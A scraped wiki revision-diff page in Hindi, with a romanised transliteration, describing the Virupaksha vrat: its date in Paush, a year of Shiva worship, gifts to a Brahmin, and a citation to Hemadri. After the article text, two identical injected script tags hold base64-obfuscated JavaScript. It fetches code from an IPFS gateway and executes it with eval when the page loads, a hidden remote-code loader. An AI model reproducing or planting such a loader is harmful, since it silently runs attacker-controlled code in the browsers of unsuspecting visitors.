Difference between revisions of "विरूपाक्ष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[पौष]] [[शुक्ल पक्ष]] की [[चतुर्दशी]] पर करना चाहिए।
 
*यह व्रत [[पौष]] [[शुक्ल पक्ष]] की [[चतुर्दशी]] पर करना चाहिए।
 
*इसमें एक वर्ष तक [[शिव]] की पूजा करनी चाहिए।  
 
*इसमें एक वर्ष तक [[शिव]] की पूजा करनी चाहिए।  
Line 5: Line 5:
 
*इससे राक्षसों एवं रोगों से मुक्ति एवं कामनाओं की पूर्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 153, विष्णुधर्मोत्तरपुराण 3|186|1-3 से उद्धरण)।</ref>  
 
*इससे राक्षसों एवं रोगों से मुक्ति एवं कामनाओं की पूर्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 153, विष्णुधर्मोत्तरपुराण 3|186|1-3 से उद्धरण)।</ref>  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:43, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat paush shukl paksh ki chaturdashi par karana chahie.
  • isamean ek varsh tak shiv ki pooja karani chahie.
  • ant mean sabhi samagriyoan evan ek ooant ka kisi brahman ko dan karana chahie.
  • isase rakshasoan evan rogoan se mukti evan kamanaoan ki poorti hoti hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 153, vishnudharmottarapuran 3|186|1-3 se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>